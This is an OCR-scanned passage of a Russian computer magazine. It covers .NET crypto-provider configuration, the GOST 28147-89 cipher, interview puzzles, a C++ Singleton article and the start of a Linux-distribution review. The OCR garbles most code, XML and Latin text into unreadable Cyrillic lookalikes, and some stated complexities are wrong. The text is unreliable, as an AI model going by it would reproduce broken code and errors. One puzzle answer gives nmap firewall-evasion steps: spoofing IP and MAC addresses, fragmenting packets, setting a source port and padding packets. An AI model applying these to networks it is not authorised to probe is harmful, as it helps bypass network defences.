дится правка его конфигурации. Основные параметры фреймворка 
собраны в файле тасЫпе.сопЛд, который имеет форматХМІ. и от- 
вечает за настройку фреймворка для всей системы в целом. 

За криптографические настройки отвечает элемент 
сгурІодгарЬуСеШпдз, который является дочерним элементом 
тзсогІіЬ. Процедура привязки имени класса криптографиче- 
ского алгоритма к имени алгоритма называется Ыате Марріпд. 

Она выполняется следующим образом: сначала объявляем класс 
алгоритма при помощи элемента сгурІоСІазз, а затем привязыва- 
ем строковое имя алгоритма к объявленному классу при помощи 
элемента патеЕпІгу. Таким образом, в частности, можно заменить 
все стандартные имена алгоритмов. 

Привязка ОЮ к ранее объявленному классу алгоритма осущест- 



вляется при помощи элемента оібМар и его дочернего элемента 
оібЕпІгу. 

<сгур1:о%гарІіу5е1:1:іп%5> 

<сгур1:оІ\ІатеМарріп§> 

<сгур1:оС1а55е5> 

<сгур1:оС1а55 605ТСРВ= м ео5І:.Со5І:С-РЬ л Соб 1:А1§5, 
ѴегБІоп=1.Ѳ.Ѳ.0 і Си11:иге=ги л РиЫісКеуТокеп=9Ь088-Р4818сІаа492 ,, /> 
<сгѵр1=оС1а55 (505ТІМІТ0= "6 об 1= . 6о5І=Іті1=о . (зобііАі^б. 

Ѵеп5Іоп=1 .0.0.0, Си11=иге=ги . РиЫісКеѵТокеп=9ЬѲ88-Р4818сІаа492"/> 
</сгурѣоС1а5$е5> 

<патеЕп1:гу пате^СоБ^Хтп.^оАТб" с1а55="С05ТІМІТ0" /> 
спатеЕпТгу пате^'СоБІіС-РЬАІ^" с1аБ5="С05ТСРВ" /> 
спатеЕпТгу 

пате="$У5І:ет.$есипі1:ѵ.Спур1:о^парІіѵ.КеуесІНа5ІіА1^огі1:Ііт" 
с1а55="60$ТІМІТ0" /> 

<патеЕп1:гу 

пате="5уБІ:ет.5есигі1:у . Сгур1:о§парІіу .БуттеІігісАІ^огіІіІзт" 
с1а5Б="С05ТСРВ" /> 

</сгѵр1=оМатеМ а рріп§> 

<оісІМар> 

СоісІЕпІігу ОІР="1.2.643.2.2.21" пате="605І:СТЬА1е" /> 

<оісІ Епіігу ОІР="1 . 2 . 643 .2.2.22" пате="605І=Іті1=оА1^" /> 
</оісІМар> 

</сгур1:о§парІіу5е1:1:іп§5> 

Здесь мы объявляем классы 605ТСРВ и 605ТІМІТ0, а затем 
привязываем имя СозіШАІд к имени класса СозіСІЪ, а СозІІтіІоАІд 
— к имени класса Созіітііо. 

Строки 

спатеЕпТгу 

пате="5уБІ:ет.5есигі1;у .Сгур1:о§гарІіу . КеуесІНаБІіАІбогіІіІіт" 

с1а55="60$ТІМІТ0" /> 

спатеЕпТгу 

пате=" Бузует. Беси гіііу .Сгѵр1іо§гарІіу .БѵттеІігісАІ^огіІіІіт" 
с1а55="С05ТСРВ" /> 

гарантируют, что теперь по умолчанию симметричным алго- 
ритмом является СозіСІЪ, а ключевой хеш-функцией — Созіітііо 
(см. рисунок 5). Теперь при вызове метода БуттеІгісАІдогШиті. 
Сгеаіе с параметром СозіСЛэАІд будет создаваться эк- 
земпляр нашего класса. То же самое верно и для вызова 
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.ЫЕТ-криптография 



ГОСТ 28147-89 



ГОСТ 28147-89 является стандартом СНГ и определяет блочный 
симметричный алгоритм шифрования, а также четыре режима его 
работы. Программная реализация алгоритма очень проста, так 
как он состоит из простых операций: ХОР, сложения по модулю 
2 Л 32 и циклического сдвига на 11 бит влево. В самом начале блок 
открытого текста (8 байт] разбивается на две части по 4 байта 
каждая. К правой части прибавляется ключ (по тосі 2 Л 32), после 
чего результат преобразуется в соответствии с таблицей замены 
(5Вох), а затем ксорится с левой частью. Далее части меняются 
местами. Такой порядок действий сохраняется на протяжении 
31-го раунда, на последнем 32 раунде части не меняются местами, 
а компонуются в блок шифрованного текста размером 8 байт. 
Алгоритм, определенный в ГОСТе 28147-89, является очень 
быстрым и обеспечивает надежную защиту данных. В открытой 
криптографии еще не известен способ существенного снижения 
стойкости этого алгоритма. Общую схему его работы смотри на 
рисунке 7. 



КеуесІНазЬАІдопіЬпп.СгеаІе, однако в этом случае вторым пара- 
метром нужно передавать ключ. Все перечисленные вызовы в 
итоге сводятся к вызову метода СгурІоСопЛд.СгеаІеРготМаппе, в 
котором объекты создаются при помощи АсІіѵаІог.СгеаІеІпзІапсе 
и все ошибки подавляются пустым саІсЬ. Так что при правке 
конфигурации необходимо быть предельно внимательным — при 
малейшей ошибке вместо ссылки на нужный экземпляр класса 
можно запросто получить п и 1 1 . 

В секции оісІМар мы осуществили привязку ОЮ алгоритма 
к его имени, и теперь при помощи класса СгурІоСопПд легко 
можно получить ОЮ по имени алгоритма. Кстати, в М50ІМ гово- 
рится, что значение атрибута пате элемента оісІЕпІгу должно 
совпадать с именем класса (в нашем случае, например, ОозіСІЪ), 
однако это не так — следует указать то имя, которое мы задаем в 
элементе патеЕпІгу, иначе ОЮ не будут маппиться к именам. 

Вообще, при возникновении каких-либо проблем, под отлад- 
чиком можно легко посмотреть данные, прочитанные из файла 
тасЫпе.сопПд. Заданные пользователем ОЮ хранятся в ргіѵаіе- 
коллекции тасИіпеОісІНТ, а привязанные имена — в-ргіѵаіе 
коллекции тасНіпеІ\ІатеНТ класса СгурІоСопПд (см. рисунок 6). 

ИСПОЛЬЗОВАНИЕ 

Для реализации шифрования и хеширования СЕР использует 
поточно-ориентированный подход, ключевую роль в котором 
играет класс СгурІоЗігеат, являющийся производным от класса 
Вігеат. Благодаря такому подходу появляется возможность 
сцеплять разные объекты и осуществлять разные криптогра- 
фические операции без создания промежуточных буферов для 
хранения данных. 

Так, например, сначала данные из потока с открытым текстом 
поступают в данные с СгурІоЗігеат симметричного алгоритма, а 
выход этого потока — на СгурІоЗігеат алгоритма хеширования. 
При таком подходе одновременно осуществляется шифрова- 
ние и хеширование открытого текста. Пример использования 
поточно-ориентированного подхода смотри в исходниках на 
диске. 

При использовании СгурІоЗігеат для дешифрования следует 
учитывать то, что он обычно считывает из потока целое число 
блоков. В некоторых случаях, когда за шифрованным текстом 
следуют другие данные, а размер шифрованных данных не кратен 
размеру блока алгоритма, может потребоваться коррекция свой- 
ства РозШоп потока-источника для СгурІоЗігеат. 




Схема алгоритма, описанного в ГОСТе 28147-89 



моыо ррсиЕСт 

Все описанное выше справедливо и для Мопо, однако в синтак- 
сисе команд, используемых для добавления сборки в БАС, есть 
небольшие различия. Так, например, для добавления сборки в 
глобальный кеш нужно использовать следующую команду: 

$ %аси1:і1 -і <Путь и имя сборки> 

А для просмотра параметров сборки — воттакую: 

$ §аси1:і1 -1 

Файл тасЫпе.сопЛд находится (ОС ІІЬипІи) в /еІс/топо/<Версия 
Мопо>/. 



ЗАКЛЮЧЕНИЕ 

Вот и все, теперьты сам можешь накодить криптографический 
алгоритм в стиле .І\ІЕТ Ргатеѵѵогк, а также создать свою сборку- 
криптопровайдер и корректно установить ее. А если остались 
какие-то вопросы или есть что обсудить — пиши мне на почту. НС 
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Павел Александрович (іѵіпзісіе.ЫодзроІ.сот) 




УСЛОВИЕ 



Есть два одинаковых стеклянных шарика. За какое минимальное 
число бросков можно гарантированно определить, при падении 
с какого этажа стоэтажного здания шарики начинают разбиваться? 

РЕШЕНИЕ 

Сначала хочу отметить, что искомое число заметно меньше 50 
— первого варианта, который пришел мне на ум (первый шарик 
бросаем с 50 этажа; в зависимости от исхода второй шарик броса- 
ем, начиная с первой или второй половины этажей). Единственное 
верное предположение здесь состоит в том, что бросок первого 
шарика должен разделить все этажи на некоторые интервалы. 
Обозначим этот интервал за х. Таким образом, за х бросков мы 



в худшем случае пробьем все эти интервалы. В случае если первый 
шарик разобьется при броске с какого-то этажа, возьмем второй: 
его нужно будет последовательно кидать, начиная с последнего 
этажа, при броске с которого первый шарик еще не разбивался. 

Это займету нас в худшем случае (100 - х) / х бросков. 

Итак, мы получили функцию у(х) = х + (100 - х) / х. Осталось найти 
её минимум. Как известно, минимумом функции является такая 
точка, где производная функции равна нулю. В качестве упраж- 
нения предоставлю тебе найти его самостоятельно ;). Ну а я лишь 
констатирую, что он достигается в точке, где х = 10, а сама функция 
принимает значение 19. Спешутебя расстроить! Это не оптималь- 
ный вариант. Мы не учли, что при разделении всех этажей на ин- 
тервалы бросаем первый шарик... 

Следовательно, интервалы должны быть неодинаковыми. 
Например, если при броске с верхнего этажа первого интервала 
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шарик не разбился, то мы идем на верхний этаж второго интер- 
вала, не забывая при этом, что один бросок уже сделан! Чтобы 
минимизировать количество оставшихся бросков, нужно сделать 
второй интервал на один этаж меньше предыдущего. Таким обра- 
зом, мы получаем арифметическую прогрессию: п(к) + (п(к) - 1) + ... + 
(п(к) - к + 1), где к — количество интервалов, п — величина первого 
интервала. Её сумма, которая как раз и равна количеству этажей, 
вычисляется по формуле для суммы арифметической прогрессии: 

(2 * п (к) - к + 1] * к / 2. Получаем функцию п(к) = 100 / к + к / 2 - 1/2, 
минимум которой нам и предстоит найти. :) Забегая вперед, скажу, 
что он равен корню из 200, а если отбросить дробную часть, то 14, 
что и является оптимальным количеством бросков. 

УСЛОВИЕ 



Существует следующий фрагмент программы: 

*окепз = [] 

-Рог Ііокеп іп Ііокепіііег: 

і-р Ііокеп по* іп *окепз: 

*окепз .аррепсІ(*океп) 

Здесь Іокепзііег — итератор, выдающий достаточно большую 
последовательность токенов, которые могут повторяться. 

На выходе этот фрагмент программы выдает массив уникальных 
токенов без повторений, в котором сохранен хронологический поря- 
док появления токенов из входной последовательности Іокепзііег. 

Нужно оценить временную сложность этого фрагмента и предло- 
жить обоснованные способы оптимизации. 



РЕШЕНИЕ 

Основную проблему здесь создает строчка «і-Р *океп по* іп 
*окепз:», из-за нее сложность алгоритма становится равной 
0(п*т), причем 1 < т < п. Сразу же напрашивается вариант оптими- 
зации с помощью словаря, где мы не будем перебирать все элемен- 
ты в поисках повтора, а проверка будет выполняться за одну опе- 
рацию. Для этого в качестве ключа используем токен, а в качестве 
значения — его номер, чтобы потом восстановить хронологию. Код 
для тестирования выглядиттак: 

ітрог* гапсіого 
ітрог* *ітеі* 



# Генерируем псевдослучайную последовательность токенов 

# В данном случае это числа от 1 до 99999 

і = [] 

■Рог і іп хгап§е(1. 2ѲѲѲ0): 

-р. аррепсІ(гапсІот. гапс!гап§е(1., 100000) ) 



# Исходный алгоритм 
сіе-р -Рипс1() : 

*окепз = [] 

-Рог *океп іп -Р: 

і-р *океп по* іп *окепз: 
*окепз.аррепсІ(*океп) 



# Оптимизированный алгоритм 

сіе-р -Рипс2() : 

*океп5с[іс* = {} 
і = 0 

-Рог *океп іп -Р: 

і-р по* *окепзсІіс* . Ііа5_кеу(*океп) : 

# Формируем словарь токен: номер 

*окепв4іс*[*океп] 

і += 1 

# Инициализируем массив с длиной словаря 



*окепз = [0 -Рог і іп хгап§е(1еп(*окепзсІіс*) ) ] 

# И сразу же вставляем каждый элемент на своё место 
-Рог кеу іп *окепз: 

*океп5[*океп5[кеу] ] = кеу 



* = *ітеі*.Тітег(5е*ир= ' -Ргот таіп ітрог* -Рипсі ' . 

5*т*= ' -Рипс1( ) ' ) 
ргіп* *. *ітеі*( питЬег = 1) 

* = *ітеі*.Тітег( , 5е*ир='-Ргот таіп ітрог* -Рипс2 1 , 

5*т*='-Рипс2Р ' 
ргіп* * .*ітеі*(питЬег ^1) 

В итоге у меня получились такие результаты: 

$ ру*боп2 *ез*.ру 

6.80089592934 

0.0135538578033 



Второй алгоритм отработал более чем в 600 раз быстрее. Его 
сложность можно оценить как 0(п), поскольку поиск возможного 
повтора в словаре происходит за одну операцию. В качестве про- 
межуточного оптимизированного алгоритма можно использовать 
двоичный поиск повторяющихся токенов. Такой алгоритм будет 
иметь сложность 0 (Іод п). Можешь попробовать самостоятельно 
реализовать его на досуге. 

УСЛОВИЕ 



Как ограничить использование процессора одним из приложений? 
На сервере стоит І_іпих. 

РЕШЕНИЕ 

Многим системным администраторам наверняка известна специ- 
альная утилита сриіітіі, которая в определенные моменты време- 
ни отправляет приложению сигналы 5І65Т0Р и 5І6С0ЫТ: 

# сриііті* — рісІ=< рісі > - -1іті*=<ѵа1ие> 

В ѵаіие указывается число, которое представляет собой макси- 
мальное процессорное время в процентах, выделенное под при- 
ложение с идентификатором рісі. На многопроцессорных системах 
процент нужно указывать с учетом количества СРІІ, то есть, чтобы 
на 4-процессорной машине выставить неограниченное время 
работы, нужно задать не 100%, а 400%. 

Правильнее использовать фичу ядра под названием сдгоирз, 
но это не всегда возможно. Она позволяет распределять процес- 
сы по группам и ограничивать использование процессора этими 
группами. Для начала нужно установить некоторые утилиты для 
работы с сдгоирз: 

$ уаоиг* -5 НЬ с ^гои р 



ЧТОБЫ МИНИМИЗИРОВАТЬ 
КОЛИЧЕСТВО ОСТАВШИХСЯ 
БРОСКОВ, НУЖНО СДЕЛАТЬ 
ВТОРОЙ ИНТЕРВАЛ 
НА ОДИН ЭТАЖ МЕНЬШЕ 
ПРЕДЫДУЩЕГО 
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кодинг 



Пример конфигурационного файла, в котором создается три 
группы: 

§гоир сіе-раиіі { 
регт { 

іазк { 

иісі = гооі; 

§ісІ = гооі:; } 

асітіп { 

иісі = гооі:: 

§ісІ = гооі;_}} 

сри { 

сри. БІіагеБ = 10; }} 



^гоир сІаетопБ/іотсаі { 
регт { 

іаБк { 

иісі = гооі; 

§ісІ = гооі; } 

асітіп { 

иіс і = гооі; 

%ісІ = гооі: }} 

сри { 

сри . БІіагеБ _м 40; }} 



§гоир сІаетоп5/ро5і§ге5 { 

регт^[ 

іаБк { 

иісі = гооі; 

§ісІ = гооі;_} 
асітіп { 

иісі = гооі; 

§ісІ = гооі; }} 

сри { 

сри. БІіагеБ = 50; }} 



тоипі^С 

сри = /тпі/с§гоир5/сри; 
сриассі = /тпі/с§гоир5/сри; 

■Ь- 

В соответствии с этим конфигом, при пиковой нагрузке процес- 
сорное время распределяется между этими группами следующим 
образом: для группы сІаетопзЛотсаІ — 40 %, для группы сіаетопв/ 
розідгез — 50 %, для сіеіаиіі — 10 %. Теперь осталось рассортиро- 
вать процессы по группам. Это делается в /еіс/сдгиіез.сопі: 



<и5ег> 

* :іотсаі 


<соптгоііег5> 

сри 


<ае5Тіпатіоп> 

сІаетопБ/іотсаі/ 


* : ро5і§ге5 


сри 


сІаетоп5/ро5і§ге5/ 


* 


сри 


сіеіаиіі/ 



Все процессы с именем Іотсаі отправляем в группу сіаетопб/ 
Іотсаі, с именем розідгез — в группу сІаетопБ/роБІдгеБ, а осталь- 
ные — в группу сіеіаиіі. 

ЗАДАЧА 



В консоли запущена следующая команда: 

# птар -5$ -Рп -п -іі- асііѵе-ІіоБІБ 

Через пять минут после запуска сканирование резко замед- 
ляется. В логе зафиксировано, что примерно в этотже момент 
вердикты по всем хостам/портам приобретают статус ііііегесі. Твои 
предположения и дальнейшие действия? 



В СЛЕДУЮЩЕМ ВЫПУСКЕ 

Задача 1 

Возникло подозрение, что один из твоих веб-серверов взломан. 
Необходимо: а) проверить систему на предмет руткитов, б] на будущее 
настроить уведомление администратора о малейшей подозрительной 
активности, возникающей на сервере или направленной на него. 

Задача 2 

Дан большой массив данных в файле (миллион записей]. Загрузить 
данные в таблицу, используя язык программирования РуЛіоп. 

Задача 3 

Написать скрипт, считывающий список 11Р1_ из файла (одна строка — 
один 11Р1_), скачивающий их не более чем в N потоков и сохраняющий 
каждую страницу в отдельном файле. Количество Ы, задаваемое 
аргументом командной строки, по умолчанию равно 10. Имена 
конечных файлов значения не имеют. Для реализации многопоточности 
использовать на выбор одну из стандартных библиотек Лігеасііпд, еѵепі- 
Іеі, деѵепі ТѵѵізіесІ или любую другую знакомую тебе библиотеку. 

Задача 4 

В базе данных Огасіе имеются две таблицы с одинаковым 
набором колонок. Вывести данные, которые есть в одной таблице, 
но отсутствуют в другой. 



РЕШЕНИЕ 

Статус ЛКегесІ означает, что пакеты не доходят до целевого порта. 
Этому может быть несколько причин: 

• пакеты блокируются файерволом на локальной машине; 

• пакеты блокируются файерволом между нашей машиной и целе- 
выми; 

• пакеты блокируются маршрутизатором между нашей машиной 
и целевыми; 

• пакеты блокируются файерволами на целевых машинах (хотя 
вероятность этого мала, исключать та кой вариант не стоит). 

Можно попытаться предпринять следующее: 

• сменить ІР- и М АС-адрес (может помочь, если мы находимся 

в одной подсети со всеми целевыми машинами или маршрутиза- 
тором/файерволом, который блокируетпакеты): 

# іісопб§ ѲІІ10 192.168.1.123 

# іісоп6§ еі1і0 Іім еібег 00:01:02:03:04:05 

• выполнитьдействия, описанные в предыдущем пункте, + физи- 
чески переткнуть кабель в другой порт маршрутизатора, если 
естьтакая возможность; 

• подождать некоторое время, пока нас не разбанят. 

После разбанивания использовать такие 
замечательныеопции птар, как: 

• — тах-гаіе 50 — ограничить число посылаемых пакетов 
до 50 шт/с; 

• -I — фрагментироватьпакеты; 

• -д88 — посылать пакеты с определенного порта; 

• --сіаіа-іепдиі 50 — добавлять произвольные 50 байт 
к каждому пакету. 

Все эти параметры помогают успешно обойти правила файерво- 
ла/маршрутизатора. И-И 
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на правах рекламы 




А Альфа-Банк 



Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а так же заказав по телефонам: 

(495) 229-2222 в Москве 1 8-800-333-2-333 в регионах России (звонок бесплатный) 

или на сайте 

ѵѵѵттапсагсі.ги 



(дате)ІапЛ 



ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 29.01.1998 №1326" 







ііееопіз (сіееопізгадтаіі.сот) 



Г 




Паттерн 

проектирования 

«Одиночка» 





СОЗДАЕМ ОДИН- 
ЕДИНСТВЕННЫЙ 
ОБЪЕКТ НА ВСЮ 
ПРОГРАММУ 

В объектно-ориентированном 
программировании часто необходимо, 
чтобы экземпляр какого-либо класса 
оставался единственным на протяжении 
всей жизни программы. В небольших 
проектах соблюдение этого требования не 
вызывает особых сложностей, но, чем больше 
разрастается исходный код, тем труднее 
обеспечивать это с помощью стандартных 
методов. В итоге все кодеры рано или поздно 
приходят к выводу, что нужно использовать 
паттерн «Одиночка», или Біпдіеіоп. Попробуем 
подготовиться заранее и понять, что же это за 
штука такая, Синглтон. 



начала надо выяснить, в каких ситуациях нам может при- 
^ годиться Зіпдіеіоп. Первое, что приходит на ум, — это моно- 
польное владение какой-либо информацией или состоянием. 
Объект класса, работающий с какой-либо веткой системного реестра 
ѴѴіпсІоѵѵз, изег тосіе интерфейс-драйвера или настройки програм- 
мы — все это требует очень аккуратного обращения, и паттерн «Оди- 
ночка» тут будет очень кстати. Давай представим, что у нас есть некая 
утилита, которая хранит свои настройки в іпі-файле и загружает их 
при старте. Естественно, как и все уважающие себя программы, наша 
тулза имеет окно, в котором мы можем расставить всякие галочки для 
ее тюнинга. В этом окне есть кнопка 5аѵе, которая позволяет записать 
все опции в файл. Казалось бы, все хорошо, но как остальная часть 
программы узнает об измененных настройках? Для этого во всем 
коде утилиты должен существовать единственный объект, хранящий 
актуальное состояние опций. Все остальные части программы должны 
запрашивать у этого объекта нужные параметры. Изменение настроек 
также должно происходить через этот объект. 

ПРОСТОЕ РЕШЕНИЕ 

Первое, что приходит в голову любому начинающему кодеру, — это 
создать глобальную переменную, например дЗеШпдз, для хранения 
объекта нужного нам класса. Назовем его СБеШпдз. Во всей про- 
грамме он будет единственным таким объектом, что, казалось 
бы, решает поставленную задачу. Но на самом деле такой прием 
абсолютно бесполезен. 



Глобальная переменная с настройками 

сІаББ С5е1:1:іп§5 

{ 

риЫіс: 

ѵоісі ^е1:$е1=1=іп^5П 
//... 
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} 



// Объявление глобальной переменной 



С5еі1:іп§5 §5еі1:іп§5; 

Во-первых, никто не мешает переопределить эту глобальную 
переменную. Любой желающий может заново создать объект 
СЗеШпдз и заменить им дЗеШпдз. Конечно, тут многие возразят, что, 
мол, можно перегрузить оператор присваивания для этого класса 
или конструктор копирования, но это не поможет, если дЗееЛпдз 
представляет собой указатель или ссылку. Во-вторых, даже если 
отбросить проблему с возможной переинициализацией глобальной 
переменной, разработчик может запросто забыть о ее существо- 
вании и создать новый локальный объект с настройками. И даже 
если мы торжественно поклянемся пользоваться только глобальной 
переменной дЗеШпдз, всегда существует вероятность того, что мы 
ее проигнорируем, когда решим оживить свой проект после пары 
летзабвения. К тому же подобная проблема чрезвычайно актуальна 
в программах, которые разрабатываются не одним, а несколькими 
кодерами. Ну и в-третьих, объект класса СЗеШпдз, скорее всего, 
будет создаваться в самом начале работы тулзы, что не всегда ра- 
ционально, так как при некоторых сценариях обращение к дЗеШпдз 
вообще не происходит. Придя к выводу, что глобальные переменные 
не подходят, мы заключаем, что нас спасут статические классы. 

Тут все тоже довольно-таки просто: все методы и свойства класса 
объявляются с ключевым словом зіаііс и благодаря этому остаются 
единственными и неповторимыми во всей программе. 

Статический класс с настройками 

С5е1:1:іп§5 

риЬІіс: 

Біаіііс ѵоісі ^е1=$е1=1=і п^5П 

//... 

і— 

// Обращение к методам класса 



СЗеіііп^Б: :§еі:5еі:і:іп§5(); 

Мы решаем проблему с множеством копий одного и того же 
объекта, но игнорируем тот факт, что он создается слишком рано. 
Статические классы создаются во время запуска программы, но 
они, как мы помним, могут нам вовсе не понадобиться. Кроме того, 
у такого решения есть куда более серьезный минус: невозможность 
инициализации упомянутых классов. Кодер не создает объект и 
поэтому не может его как-то инициализировать. В случае с настрой- 
ками инициализировать класс можно было бы, например, путем к 
іпі-файлу. Конечно, можно создать отдельный метод для передачи 
этого пути, но нет никакой гарантии, что кто-то не обратится к 
методам СЗеШпдз раньше, чем СЗеШпдз получит полное имя файла 
и прочитает его содержимое. 

РЕАЛИЗАЦИЯ ПАТТЕРНА 

Теперь, когда мы поняли, что справиться с поставленной задачей 
при помощи стандартных средств невозможно, пора обратиться к 
ООП и непосредственно к паттерну «Одиночка». Как известно, для 
создания объекта любого класса требуется специальный метод под 
названием конструктор. Если в классе не будет конструктора, то 
не будет и объекта, компилятор просто забракует такой код. Даже 
когда мы не определяем конструктор явно, С++ и другие языки про- 
граммирования делают это за нас. 

Также все мы знаем, что классы могут иметь открытые и за- 
крытые члены. Закрытые, или ргіѵаіе, методы и свойства доступны 
только внутри этого класса. Его клиенты не могут обратиться к ним 
напрямую, так как это вызовет ошибку компиляции. Воспользуемся 
этими знаниями и создадим класс с приватным конструктором. 




Код класса СЗіпдІеІоп; 



Класс с закрытым конструктором 

сіазз СБеЩп^Б 

{ 

ргіѵаііе: 

С$е1=1=іпд5П ; 

5І=а1=іс СБеЩп^Б* т іпБІіапсе; 
риЫіс : 

Біаіііс С5е1:1:іп§5* §е1:Іп5І:апсеО 

{ 

і-р ('т іпзііапсе == 0) 

т_іп5І:апсе = пеш С5е1=1=іп^5П ; 
геііигп т іпзііапсе; 

} 

ѵоісі §е1:5е1:1:іп%5Р 



} 



// Инициализируем нулем указатель на объект 
С$е1=1=іп^5* С5е1=1=іп^5: :ш іпзііапсе = 0; 



// Обращение к методам СЗеіІііп^Б 



СБеіііп^Б : :§еіІп5іапсе()->§е1:5е1:1:іп§5() ; 

Таким образом, мы сделали все, чтобы объект СЗеШпдз нельзя 
было создать. Мы не можем ни инициализировать его как глобаль- 
ную переменную, ни создать его с помощью оператора пеѵѵ. Однако 
мы все-таки оставили небольшую лазейку — статический метод 
деІІпзІапсеП. На самом деле именно он создает объект класса 
СЗеШпдз и присваивает его закрытой статической переменной 
т_іп5Іапсе, причем все это происходит только в том случае, если 
указатель на объект равен нулю, то есть если он не был создан 
ранее. Таким образом, мы получаем 100 %-ю гарантию того, что 
наши настройки будут существовать в единственном экземпляре, 
пока программа не завершит работу, и устраняем проблему с пре- 
ждевременным созданием объекта, так как память под него будет 
выделена лишь во время первого обращения к его методам. 

УНИВЕРСАЛЬНЫЙ КОД 

Объединять в одном классе две функции (доступ к настройкам про- 
граммы и Синглтон) не очень хорошая идея. Каждый класс должен 
отвечать за свою область и не лезть в другие. Попробуем создать 
такой код, который бы позволил превращать любые классы в «оди- 
ночки». Стандартный путь с наследованием нам не подойдет. Мы бы 
могли написать класс СЗіпдІеІоп, который выступал бы в качестве 
базового для других классов, но нам нужен статический метод 
деІІпзІапсеП, который должен создавать объект нужного типа. Ро- 
дительский класс ничего не может знать о своих потомках, поэтому 
мы могли бы попробовать определить абстрактный виртуальный 
метод, который бы переопределялся в потомках и возвращал 
объект класса (мы же помним, что конструктор у нас приватный и 
создать объект может только метод того же класса), но, к сожале- 
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нию, вызвать этот метод из статического деііпзіапсе у нас никак не 
получится. Поэтому мы пойдем другим путем. 

Класс С51п^1е1:оп 

іетріаііе <с1эбб Т > 
сіэбб С5іп§1е1іоп 

риЫіс : 

ѵігіиаі ~С5і п^1е1іопО {}; 



Бііаіііс Т* §е1іІп5Ііапсе() 

{ 

і-р (ш_і п5І=апсе == 0) 
т = іп5Ііапсе = пеш Т() ; 
геііигп ш іпБІіапсе; 

} 

ргоііесііесі : 

С5іп§1е1іоп() {}; 

Бііаіііс Т* ш іпБІіапсе; 



// Объявление класса С5е1і1ііп§5 

сІаББ СБеШп^Б : риЫіс С5іп§1е1іоп<С5е1і1ііп§5> 

Ь_ 

ргіѵаііе: 

С5е1і1ііп§5(); 

ргоііесііесі: 

-РгіепсІ сІаББ С$і п^1е1іоп<С$е1і1ііп^5> ; 

риЫіс : 

Бііаіііс ѵоісі ^еіЗеІіІііп^БО 

_ и ... 

Объявив СБіпдІеіоп шаблоном, мы сможем создавать в методе 
деііпзіапсе объекты любых типов. Однако особо вниматель- 
ные возразят нам, заявив, что такой трюк не сработает, так как 
конструктор у нашего СЭеШпдз по-прежнему приватный, а мы 
пытаемся создать объект настроек с помощью пеѵѵ. Это было бы 
справедливо, если бы в С++ не было ключевого слова РгіепсІ, ко- 
торое позволяет объявить класс дружественным и дать ему доступ 
к закрытым членам. Такой маленький чит в 00-модели помогает 
нам реализовать полноценный шаблонный паттерн «Одиночка». 
Теперь мы можем сделать уникальным любой класс, добавив в 
него лишь пару строк кода. Кстати, один из плюсов такого подхода 
состоит в том, что в случае изменения СБіпдІеіоп не потребуется 
править все остальные классы, которые его используют. А как 
может измениться СБіпдІеіоп, мы сейчас узнаем. 



!И^І'-ИМЙ 




Диаграмма классов паттерна 




ѴѴікіресІіа про наш паттерн 



МНОГОПОТОЧНОСТЬ 

Если обращение к настройкам идет из нескольких потоков, то два 
потока вполне могут одновременно попытаться создать еще не 
существующий объект СЭеШпдз. Представим, что тред № 1 вызвал 
метод деРІпзРапсе. Он успешно проверил, не равен ли ігмпзРапсе 
нулю, обнаружил, что СЗеШпдз еще не создан, и решил его создать. 
Но тут его прервал поток № 2, который тоже обратился к деііпзіапсе, 
но, в отличие от первого, успел создать объект т_іп5Іапсе. Затем 
активировался тред № 1, находящийся в полном неведении о том, 
что СЭеШпдз уже существует, создал свою копию объекта и при- 
своил его т_іп5Іапсе. В такой ситуации мы как минимум получим 
утечку памяти. В худшем случае все сломается и нас ждет конец 
света, если мы, например, пишем софт для всемирной сети атомных 
электростанций. 

Для того чтобы этого не случилось, нужна синхронизация. В С++ 
нет встроенных методов межпотоковой синхронизации, поэтому при- 
дется воспользоваться АРІ-функциями ОС. В ѴѴіпсіоѵѵб код СБіпдІеіоп, 
адаптированный для многопоточной среды, выглядиттак: 

Многопоточность и С5іп§1еіоп 

іетріаііе <с1а55 Т> 
сІаББ С5іп§1е1іоп{ 

риЫіс: 

ѵігііиаі ~С5іп§1е1іопР {}; 
а'Ьа'ЕІс Т* деіІпБіапсеО 
{ 

ЕпіегСгі1ііса15ес1ііоп( . . . ) ; 



і-р ( т іпБІіапсе == 0) 
т_іп5Ііапсе = пеш Т О ; 



І_еаѵеСгі1ііса15ес1ііоп( . . . ) ; 



геііигп ш іпБІіапсе; 

} 

ргоііесііесі: 

СЗіпбХеЕррО { }; 

Бііаіііс Т* ш іпвііапсе; 

}; 

С помощью механизма критических секций мы защищаем код, 
создающий объект СЗеШпдз, от одновременного выполнения. Те- 
перь можно без опасений распараллеливать нашу программу на все 
ядра и процессоры, которые существуют в системе. 

ЗАКЛЮЧЕНИЕ 

Паттерн «Одиночка» представляет собой один из самых простых 
паттернов в ООП. Эта простота расслабляет, однако тут, как и везде, 
есть свои подводные камни, о которых нужно знать. Эти знания 
очень пригодятся всем, кто хочет кодить по-взрослому. НС 
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ІЖІХОЮ 



Сергей «дгіпсіег» Яремчук (дгіпсіеггаіих.іп.иа) 






ОБЗОР ВЕТОК ПОПУЛЯРНЫХ 
ДИСТРИБУТИВОВ ишіх 




Пытаться угодить 



птш 



ПОСЛЕДОВАТЕЛИ 6ЕМТ00 



всем и каждому очень 
тяжело, поэтому даже у 
пользователей самого 
«заряженного» Линукса 
возникает куча проблем: 
то нет нужной программы, 
то установщик не такой, 
то локализация хромает, 
то пакет в репозитории 
имеет не самую последнюю 
версию и так далее. 

В итоге появилось 
большое количество 
веток и дополнительных 
репозиториев пакетов. 
Некоторые из форков 
догнали и даже 
перегнали родительские 
дистрибутивы. 



• Название 5а- 
Ьауоп произошло от 
названия известного 
итальянского 
десерта. 

• В ЗаЬауоп етегде 
«видит» пакеты, 
установленные 
через ецио, и 
наоборот. 

• В .сопТід Саісиіаіе 
Ыпих содержится 
1560 модулей, а 

в его ядре — 866, 
в ЗаЬауоп и его 
ядре — 2625 и 1250 
соответственно. 

• В разных 
версиях Саісиіаіе 
Ыпих рабочий стол 
выглядит одинаково. 

• Ыпих Міпі богат 
приложениями 
собственной 
разработки. 

• В РСЫпихОЗ 
отсутствует сборка 
х64. 

• По сути, Мадеіа 
представляет собой 
неофициальную 
версию Мапсігіѵа. 



Дистрибутив Зепіоо, популярность которого буквально взлетела 
в начале века, не отличался дружелюбностью к новичкам, причем 
на всех этапах: отустановки и конфигурирования системы до 
повседневной работы. Так как разработчики нечасто баловали 
сообщество новыми релизами, а процедура компиляции программ 
